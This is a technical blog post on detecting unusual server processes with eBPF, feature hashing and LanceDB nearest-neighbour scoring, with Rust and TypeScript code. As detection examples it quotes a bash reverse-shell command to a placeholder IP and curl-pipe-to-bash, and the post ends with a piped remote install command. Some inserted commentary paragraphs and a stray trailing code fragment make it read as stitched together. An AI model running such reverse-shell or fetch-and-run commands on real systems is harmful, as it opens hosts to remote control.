Detecting unusual processes on your servers without writing a single rule

Most security tooling works by asking you to define what "bad" looks like upfront. Falco gives you YAML rules. OSSEC has signatures. Wazuh has a 5,000-line ruleset that ships with the product and still misses half of what matters in your specific environment. The problem isn't that rules are bad; it's that they can only catch what someone already thought to write a rule for. A novel attack, an unusual deployment pattern, or a rogue process your team introduced six months ago and forgot about will all sail straight through.

We wanted something different: a system that learns what "normal" looks like on each server and workload automatically, and flags anything that deviates, without any configuration. Here's how we built it using eBPF and LanceDB.

Step 1: Capture everything at the kernel level with eBPF

eBPF lets you attach programs to kernel events with minimal overhead. We attach to the sys_enter_execve tracepoint, which fires every time any process is executed on the machine, before the process even starts running. For each execution we capture:

- The process name (comm) and full command line (argv)
- The parent process name
- The UID of the calling process
- Any active network connections (src/dst IP, port)

This is written in Rust using the Aya framework, which compiles the eBPF kernel program separately and loads it at runtime:

    #[tracepoint]
    pub fn gretl_execve(ctx: TracePointContext) -> u32 {
        // Offset 16 holds the filename pointer in the sys_enter_execve record
        let Ok(addr) = (unsafe { ctx.read_at::<u64>(16) }) else { return 1 };
        let filename_ptr = addr as *const u8;
        let pidtgid = bpf_get_current_pid_tgid();
        let pid = (pidtgid >> 32) as u32; // upper 32 bits: tgid (userspace PID)
        // ... fill in the event and write it to the ring buffer
        0
    }

The events are written to a ring buffer and consumed by the userspace agent, which batches them and POSTs to the backend every 60 seconds. On kernel ≥ 5.8 with BTF enabled, zero instrumentation is required: no agents inside your containers, no sidecars, no changes to your application code.

For servers without eBPF support, the Node.js agent falls back to reading /proc/<pid>/cmdline and /proc/<pid>/status directly, tracking new PIDs each interval. You lose the real-time kernel hook but still get the process telemetry.

Step 2: Represent each process execution as a vector

The raw event (a process name, a cmdline string, a parent process, a port) isn't directly comparable. To measure similarity between executions, we need to turn each event into a fixed-length vector.

We use feature hashing: tokenise the event fields, hash each token into a position in a 128-dimensional vector, and accumulate signed contributions. The result is normalised to a unit vector.
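
The feature-hashing step relies on two helpers, hashStr and tokenise, that the post calls but never shows. The sketch below is one plausible way to write them, not the authors' implementation: it assumes a seeded 32-bit FNV-1a hash and a tokeniser that splits on whitespace and common shell and path delimiters. Both function bodies and the delimiter set are assumptions made for illustration.

```typescript
// Hypothetical helpers: featureVector() calls hashStr() and tokenise(),
// but the post does not define them. These bodies are assumptions.

// Seeded 32-bit FNV-1a. Returns an unsigned integer, so `% 128` is never negative.
export function hashStr(s: string, seed: number): number {
  let h = (0x811c9dc5 ^ seed) >>> 0; // FNV offset basis mixed with the seed
  for (let i = 0; i < s.length; i++) {
    h ^= s.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0; // multiply by the FNV prime, keep 32 bits
  }
  return h >>> 0;
}

// Split a command line on whitespace and common shell/path delimiters,
// dropping empty fragments.
export function tokenise(cmdline: string): string[] {
  return cmdline
    .split(/[\s/=:;|&<>,"'()]+/)
    .filter((t) => t.length > 0);
}
```

With this delimiter set, a reverse-shell command line breaks into tokens such as bash, -i, dev, tcp, the IP address and the port, which share almost nothing with the tokens of bash --login. A different delimiter set would change which executions look alike, so the tokeniser is worth tuning against real command lines.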

    function featureVector(event: ProcessEvent): number[] {
      const vec = new Float32Array(128);
      const tokens = [
        event.process_name,
        event.parent_process,
        event.event_type,
        String(event.local_port),
        String(event.remote_port),
        ...tokenise(event.cmdline), // split cmdline into meaningful tokens
      ];
      for (let i = 0; i < tokens.length; i++) {
        const t = tokens[i].toLowerCase().trim();
        if (!t) continue;
        const idx = hashStr(t, i * 31) % 128;
        const sign = (hashStr(t, i * 31 + 1) & 1) ? 1 : -1;
        vec[idx] += sign;
      }
      // L2 normalise so cosine distance is well-defined
      let norm = 0;
      for (let i = 0; i < 128; i++) norm += vec[i] * vec[i];
      norm = Math.sqrt(norm) || 1;
      return Array.from(vec).map(v => v / norm);
    }

Feature hashing is deterministic, requires no external model, adds negligible latency, and works well for this kind of structured-text input. A bash -i >& /dev/tcp/... command and a normal bash --login invocation will land in very different regions of the vector space.

Why not use a neural embedding model?

We looked at this seriously. Models like all-MiniLM-L6-v2 (about 22M parameters, 384 dims) or OpenAI's text-embedding-3-small would give richer semantic similarity: they know that sh and bash are both shells, that /tmp and /dev/shm are both writable scratch paths.

The problem is the operational cost at ingestion time. The agent reports process events roughly every 60 seconds per server. For a fleet of 50 servers that's ~3,000 reports per hour (50 servers × 60 reports), and every event in them needs an embedding before it can be scored and stored. The options were:

- Local model on the backend: works, but adds a cold-start dependency, ~200 MB of model weights on disk, and 5–20 ms of CPU per event. On a small Fly.io instance shared with the API server, that's noticeable.
- External API (e.g. OpenAI): adds network latency to every ingest request, a per-token cost that scales with fleet size, and a hard external dependency that can take your security pipeline down.
- Feature hashing: runs in <0.1 ms, zero dependencies, no network calls, fully deterministic. The same input always produces the same vector, which also makes testing straightforward.

For this specific input (structured fields like process names, parent process names, and cmdline tokens) feature hashing performs surprisingly well. bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 and bash --login land in very different regions of the vector space because their token sets barely overlap. That's all we need for anomaly scoring.

The embedding layer is intentionally isolated behind a single featureVector() function. Swapping it for a neural model later is a one-function change: the scoring logic, the LanceDB tables, and the API surface don't care what's inside it.

Step 3: Store and query with LanceDB

LanceDB is an embedded vector database: it runs inside your process, stores data on disk, and supports fast approximate nearest-neighbour search with no separate infrastructure required.

We create one LanceDB table per (org_id, workload) pair. Each row stores the 128-dim vector and a timestamp. The table grows as new events arrive, and entries older than 7 days are pruned.
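
The scoring code for this step calls a cosineDistance helper that the post does not define, and turns the nearest-neighbour distance into a score by doubling it and capping at 1. The sketch below isolates those two pieces so the arithmetic is easy to check. The cosineDistance body and the anomalyScore name are assumptions for illustration; only the min(1, 2 × distance) mapping comes from the post.

```typescript
// Hypothetical helper: the post calls cosineDistance() without showing it.
// Returns 1 - cosine similarity, so identical directions give 0 and
// orthogonal vectors give 1.
export function cosineDistance(a: number[], b: number[]): number {
  let dot = 0;
  let na = 0;
  let nb = 0;
  for (let i = 0; i < a.length; i++) {
    dot += a[i] * b[i];
    na += a[i] * a[i];
    nb += b[i] * b[i];
  }
  const denom = Math.sqrt(na) * Math.sqrt(nb);
  if (denom === 0) return 1; // assumption: treat a zero vector as maximally distant
  return 1 - dot / denom;
}

// Same mapping as the post's scoring step, pulled out under an assumed name:
// take the closest neighbour, double its distance, cap at 1.
export function anomalyScore(distances: number[]): number {
  if (distances.length === 0) return 1.0; // empty baseline: completely unseen
  return Math.min(1, Math.min(...distances) * 2);
}
```

Under this mapping, a nearest neighbour at cosine distance 0.425 produces a score of 0.85, and any distance of 0.5 or more saturates at 1. Only the single closest neighbour matters, so one prior occurrence of an execution is enough to pull its score down on the next run.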

    export async function scoreAndLearn(
      org_id: string,
      workload: string,
      event: ProcessEvent,
    ): Promise<number> {
      const conn = await db();
      const table = await getOrCreateTable(conn, tableName(org_id, workload));
      const vec = featureVector(event);

      // Find k=10 nearest neighbours in this workload's history
      const results = await table.vectorSearch(vec).limit(10).toArray();

      let score = 1.0; // default: completely unseen
      if (results.length > 0) {
        const distances = results.map(r =>
          cosineDistance(vec, Array.from(r.vector))
        );
        const minDist = Math.min(...distances);
        score = Math.min(1, minDist * 2); // scale to [0, 1]
      }

      // Add this event to the baseline for future comparisons
      await table.add([{ vector: vec, ts: Date.now() }]);
      return score;
    }

The anomaly score is close to 0 for an execution that closely matches something already in the baseline, and 1 for something completely new. It gets stored alongside the event in ClickHouse so you can query, filter, and alert on it.

Step 4: Natural language search

Once every event is a vector, querying by description becomes trivial. We embed the search query using the same feature-hashing pipeline and run a nearest-neighbour search across all workload tables.

    // In the dashboard Security tab:
    // "show me anything that looks like a reverse shell"
    POST /telemetry/security/search
    { "query": "reverse shell bash outbound connection" }

This returns the events whose vectors are closest to the query vector: semantically similar behaviour, not keyword matches. A process running bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 will score highly even if it doesn't contain the literal words "reverse shell".

What it looks like in practice

After running on a production server for a few days, the baseline learns what "normal" looks like: your web server process, your cron jobs, your deployment scripts.
Then:

- A developer accidentally leaves a debug shell running → anomaly score 0.85, flagged as warn
- Your CI/CD pipeline runs a new build script for the first time → score 0.72 on first run, drops to 0.1 after the second run
- Someone runs curl | bash as root → score 0.94, flagged immediately
- Your usual nginx worker restarts → score 0.02, ignored

No rules were written for any of these. The system learned the baseline automatically and the deviations surfaced on their own.

The architecture in one diagram

    Server                       Backend                       Storage
    ──────                       ───────                       ───────
    eBPF (kernel) ──execve──▶    /otlp/v1/events
    /proc fallback ──────────▶        │
                                      ▼
                                 featureVector()
                                      │
                                      ▼
                                 LanceDB (per workload) ──▶ anomaly_score
                                      │
                                      ▼
                                 ClickHouse.security_events
                                      │
                                      ▼
                                 Dashboard + NL search

What's next

The current embedding is purely structural: it knows that bash and sh are different tokens, but doesn't know they're semantically similar shells. Upgrading to a small neural embedding model (something like all-MiniLM-L6-v2) would improve natural language search quality significantly, especially for queries phrased in plain English rather than technical terms.

We're also working on per-workload alert thresholds, so a security-sensitive production workload can be configured to alert at score 0.6, while a noisy dev environment uses a higher threshold of 0.85.

Try it on your servers

The agent installs in one command and starts building a baseline immediately. Works on any Linux server: EC2, GCP, bare metal. eBPF on kernel ≥ 5.8, /proc fallback everywhere else.

    GR_TOKEN=your-token bash <(curl -fsSL https://gretl.dev/install-agent.sh)

    let mut event = ExecveEvent {
        pid,
        comm: [0u8; 16],
        filename: [0u8; 64],
        argv1: [0u8; 64],
        // ...
    };
    if let Ok(comm) = bpf_get_current_comm() {
        event.comm = comm;
    }
    emit_execve(&event)